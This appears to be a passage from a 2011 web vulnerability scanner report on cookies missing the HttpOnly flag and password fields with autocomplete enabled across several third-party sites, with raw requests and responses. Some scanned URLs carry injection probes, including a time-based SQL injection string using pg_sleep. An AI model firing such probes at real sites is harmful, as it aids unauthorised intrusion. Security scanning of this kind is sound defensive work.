Set-Cookie: TresCMS[last_visit]=0; expires=Tue, 24-Apr-2012 12:20:04 GMT; path=/
Set-Cookie: TresCMS[timezone]=EDT; expires=Tue, 24-Apr-2012 12:20:04 GMT; path=/
Set-Cookie: TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:20:04 GMT; path=/
Set-Cookie: TresCMS[last_visit_temp]=1303734004; expires=Mon, 25-Apr-2011 12:30:04 GMT; path=/
Content-Type: text/html
Content-Length: 23772

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Tresware Contact Us | Web Development | Web Design, Managed Web Hosting |
...[SNIP]...

16.205. http://www.tresware.com/webcontentmanagementNJ.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tresware.com
Path:	/webcontentmanagementNJ.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TresCMS[ident]=17a4f0f1f985027144d272b8c27916a5; expires=Tue, 24-Apr-2012 12:19:53 GMT; path=/
TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:19:53 GMT; path=/
TresCMS[last_visit_temp]=1303733993; expires=Mon, 25-Apr-2011 12:29:53 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webcontentmanagementNJ.html HTTP/1.1
Host: www.tresware.com
Proxy-Connection: keep-alive
Referer: http://www.tresware.com/CustomPHPProgrammingNJ.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: igyi[s]=885141303733914696; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=17a4f0f1f985027144d272b8c27916a5; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733986

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:19:53 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Set-Cookie: TresCMS[tres_uid]=1; expires=Tue, 24-Apr-2012 12:19:53 GMT; path=/
Set-Cookie: TresCMS[tres_group]=0; expires=Tue, 24-Apr-2012 12:19:53 GMT; path=/
Set-Cookie: TresCMS[ident]=17a4f0f1f985027144d272b8c27916a5; expires=Tue, 24-Apr-2012 12:19:53 GMT; path=/
Set-Cookie: TresCMS[last_visit]=0; expires=Tue, 24-Apr-2012 12:19:53 GMT; path=/
Set-Cookie: TresCMS[timezone]=EDT; expires=Tue, 24-Apr-2012 12:19:53 GMT; path=/
Set-Cookie: TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:19:53 GMT; path=/
Set-Cookie: TresCMS[last_visit_temp]=1303733993; expires=Mon, 25-Apr-2011 12:29:53 GMT; path=/
Content-Type: text/html
Content-Length: 14368

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Web Content Management | Webpage Editing | Content Management | CMS | Real
...[SNIP]...

17. Password field with autocomplete enabled previous next
There are 296 instances of this issue:

https://checkout.netsuite.com/s.nl
https://checkout.netsuite.com/s.nl/c.438708/n.1/sc.4/.f
https://customer.kronos.com/
https://customer.kronos.com/Default.asp
https://customer.kronos.com/user/logindenied.asp
http://direct.yandex.ru/
http://direct.yandex.ru/pages/direct/_direct-1303387947.js
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm/%22ns=%22netsparker(0x000042)
https://hourly.deploy.com/hmc/report/index.cfm/%2522ns%253D%2522netsparker%25280x000048%2529)
http://mail.ru/
http://my.webalta.ru/public/engine/templates.js
http://my.webalta.ru/public/engine/templates.js
http://odnoklassniki.ru/
http://pda.loveplanet.ru/
http://pretty.ru/
https://system.netsuite.com/pages/customerlogin.jsp
http://vkontakte.ru/
http://www.livejournal.com/
http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/

17.1. https://checkout.netsuite.com/s.nl previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://checkout.netsuite.com
Path:	/s.nl

Issue detail

The page contains a form with the following action URL:

https://checkout.netsuite.com/app/site/backend/customerlogin.nl

The form contains the following password field with autocomplete enabled:

retpwd

Request

NETSPARKER /s.nl?c=438708&sc=4&whence=&n=1&ext=T HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:26:36 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -368828460:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; path=/
Set-Cookie: NLVisitorId=rcHW8495AYoCDqLY; domain=checkout.netsuite.com; expires=Sunday, 15-Apr-2012 14:26:36 GMT; path=/
Set-Cookie: NLShopperId=rcHW8495AZACDgGn; domain=checkout.netsuite.com; expires=Monday, 02-May-2011 14:26:36 GMT; path=/
Set-Cookie: NS_VER=2011.1.0; domain=checkout.netsuite.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=868
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 26851

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Checkout - ESET North America</title>

<script type="text/javascript">
var gaJsHost = (("https:" == document
...[SNIP]...
<td width=0 height=0 align='left' valign='top' style='display:none'>
<form method='post' name='login' id='login' action='/app/site/backend/customerlogin.nl' onkeypress='if (getEventKeypress(event) == 13) {if (getEventTargetType(event) == "textarea") return true;document.forms.login.submit(); event.cancelBubble=true; return false;}'>
<input type='hidden' name='origsc' value='4'>
...[SNIP]...
<span style="white-space: nowrap" id="retpwd_fs" class="effectStatic"><input onBlur="if (this.checkvalid == true) {this.isvalid=validate_field(this,'password',false,false);} if (this.isvalid == false) { selectAndFocusField(this); return this.isvalid;} " id="retpwd" maxlength="20" onChange="setWindowChanged(window, true);this.isvalid=validate_field(this,'password',true,false);this.checkvalid=false;if (this.isvalid) {;}return this.isvalid;" name="retpwd" value="" class="inputreq" onFocus="if (this.isvalid == true || this.isvalid == false) this.checkvalid=true;" type="password" size="20"></span>
...[SNIP]...

17.2. https://checkout.netsuite.com/s.nl/c.438708/n.1/sc.4/.f previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://checkout.netsuite.com
Path:	/s.nl/c.438708/n.1/sc.4/.f

Issue detail

The page contains a form with the following action URL:

https://checkout.netsuite.com/app/site/backend/customerlogin.nl?newcust=T

The form contains the following password fields with autocomplete enabled:

pwd
newpwd2

Request

GET /s.nl/c.438708/n.1/sc.4/.f?ext=T&login=T&reset=T&newcust=T&noopt=T HTTP/1.1
Host: checkout.netsuite.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=1J6WN1GLD7YF97mg4NnnrJtMTLyyBTLW5SC2xnzp2bL1BkKjmqzhQtgw4LDqyWffYxnJ5rLVX4VWGGxBLnQ6WdW126sPpQ9GcKxyvKTvtWBTh6tB9XplC3VFTz911rXl!1384455285; NLVisitorId=rcHW8415AZeYvnmq; NLShopperId=rcHW8415AciYvvMS; NS_VER=2011.1.0; mbox=check#true#1303741628|session#1303736347554-914602#1303743428|PC#1303736347554-914602.17#1304951168

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:13:46 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -1256561231:616363742D6A6176613032372E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=862
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 33384

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Login - ESET North America</title>

<script type="text/javascript">
var gaJsHost = (("https:" == document.lo
...[SNIP]...
</form>
<form method='post' name='newcust' id='newcust' action='/app/site/backend/customerlogin.nl?newcust=T'>
<input type='hidden' name='origsc' value='4'>
...[SNIP]...
<span style="white-space: nowrap" id="pwd_fs" class="effectStatic"><input onBlur="if (this.checkvalid == true) {this.isvalid=validate_field(this,'password',false,false);} if (this.isvalid == false) { selectAndFocusField(this); return this.isvalid;} " id="pwd" maxlength="20" onChange="setWindowChanged(window, true);this.isvalid=validate_field(this,'password',true,false);this.checkvalid=false;if (this.isvalid) {;}if (!this.isvalid) { selectAndFocusField(this);}return this.isvalid;" name="pwd" value="" class="inputreq" onFocus="if (this.isvalid == true || this.isvalid == false) this.checkvalid=true;" type="password" size="20"></span>
...[SNIP]...
<span style="white-space: nowrap" id="newpwd2_fs" class="effectStatic"><input onBlur="if (this.checkvalid == true) {this.isvalid=validate_field(this,'password',false,false);} if (this.isvalid == false) { selectAndFocusField(this); return this.isvalid;} " id="newpwd2" maxlength="20" onChange="setWindowChanged(window, true);this.isvalid=validate_field(this,'password',true,false);this.checkvalid=false;if (this.isvalid) {;}if (!this.isvalid) { selectAndFocusField(this);}return this.isvalid;" name="newpwd2" value="" class="inputreq" onFocus="if (this.isvalid == true || this.isvalid == false) this.checkvalid=true;" type="password" size="20"></span>
...[SNIP]...

17.3. https://customer.kronos.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://customer.kronos.com
Path:	/

Issue detail

The page contains a form with the following action URL:

https://customer.kronos.com/user/login.asp

The form contains the following password field with autocomplete enabled:

Password

Request

GET / HTTP/1.1
Host: customer.kronos.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1306330437105%26vn%3D1; __utmz=137648623.1303738437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); KronosCust=LogIn=false; ASPSESSIONIDQASQRRDR=CIMMPBCACECLKFBLHGMAAPIL; ICRedirect=Url=; Visitor=173%2E193%2E214%2E243; mbox=session#1303738433760-48782#1303742829|check#true#1303741029; s_cc=true; s_nr=1303740970638; s_invisit=true; s_lv=1303740970641; s_lv_s=First%20Visit; s_gpv_page=kronos%3Alabor-analysis%3Alabor-analysis-software.aspx; s_sq=%5B%5BB%5D%5D; __utma=137648623.1117815011.1303738437.1303738437.1303738437.1; __utmc=137648623; __utmb=137648623.9.10.1303738437

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:16:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 17287
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Set-Cookie: ICRedirect=Url=; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<SCRIPT language="JavaScript">
<!--

function verify(url) {
if (confirm("Are you sure?")) {
window.location = url;
}

...[SNIP]...
</p>

<FORM name="login" action="/user/login.asp" method="post" ID="Form1">

<TABLE border="0" cellpadding="0" cellspacing="0" width="360" ID="Table2">
...[SNIP]...
<TD><INPUT type="password" name="Password" id="Password" size="25"></TD>
...[SNIP]...

17.4. https://customer.kronos.com/Default.asp previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://customer.kronos.com
Path:	/Default.asp

Issue detail

The page contains a form with the following action URL:

https://customer.kronos.com/user/login.asp

The form contains the following password field with autocomplete enabled:

Password

Request

GET /Default.asp HTTP/1.1
Host: customer.kronos.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1306330437105%26vn%3D1; __utmz=137648623.1303738437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1303738433760-48782#1303740624|check#true#1303738824; s_cc=true; s_nr=1303738765059; s_invisit=true; s_lv=1303738765060; s_lv_s=First%20Visit; s_gpv_page=kronos%3Acustomer-support-login.aspx; s_sq=%5B%5BB%5D%5D; __utma=137648623.1117815011.1303738437.1303738437.1303738437.1; __utmc=137648623; __utmb=137648623.3.10.1303738437; KronosCust=LogIn=false; ASPSESSIONIDQASQRRDR=CIMMPBCACECLKFBLHGMAAPIL

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:39:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 17287
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Set-Cookie: ICRedirect=Url=; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<SCRIPT language="JavaScript">
<!--

function verify(url) {
if (confirm("Are you sure?")) {
window.location = url;
}

...[SNIP]...
</p>

<FORM name="login" action="/user/login.asp" method="post" ID="Form1">

<TABLE border="0" cellpadding="0" cellspacing="0" width="360" ID="Table2">
...[SNIP]...
<TD><INPUT type="password" name="Password" id="Password" size="25"></TD>
...[SNIP]...

17.5. https://customer.kronos.com/user/logindenied.asp previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://customer.kronos.com
Path:	/user/logindenied.asp

Issue detail

The page contains a form with the following action URL:

https://customer.kronos.com/user/login.asp

The form contains the following password field with autocomplete enabled:

Password

Request

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:51:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 16169
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Set-Cookie: Visitor=173%2E193%2E214%2E243; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<SCRIPT language="JavaScript">
<!--

function verify(url) {
if (confirm("Are you sure?")) {
window.location = url;
}

...[SNIP]...
</p>

<FORM name="login" action="/user/login.asp" method="post" ID="Form1">

<TABLE border="0" cellpadding="0" cellspacing="0" width="360" ID="Table2">
...[SNIP]...
<TD><INPUT type="password" name="Password" id="Password" size="25"></TD>
...[SNIP]...

17.6. http://direct.yandex.ru/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://direct.yandex.ru
Path:	/

Issue detail

The page contains a form with the following action URL:

http://passport.yandex.ru/passport?mode=auth&from=direct&retpath=http%3A%2F%2Fdirect.yandex.ru%2Fregistered%2Fmain.pl

The form contains the following password field with autocomplete enabled:

passwd

Request

Response

17.7. http://direct.yandex.ru/pages/direct/_direct-1303387947.js previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://direct.yandex.ru
Path:	/pages/direct/_direct-1303387947.js

Issue detail

The page contains a form with the following action URL:

http://direct.yandex.ru/pages/direct/_direct-1303387947.js

The form contains the following password field with autocomplete enabled:

passwd

Request

Response

17.8. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=1)%3BSELECT%20pg_sleep(25)--

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=1)%3BSELECT%20pg_sleep(25)-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e3042a9b6d0213f1e43
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:08 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:08 GMT
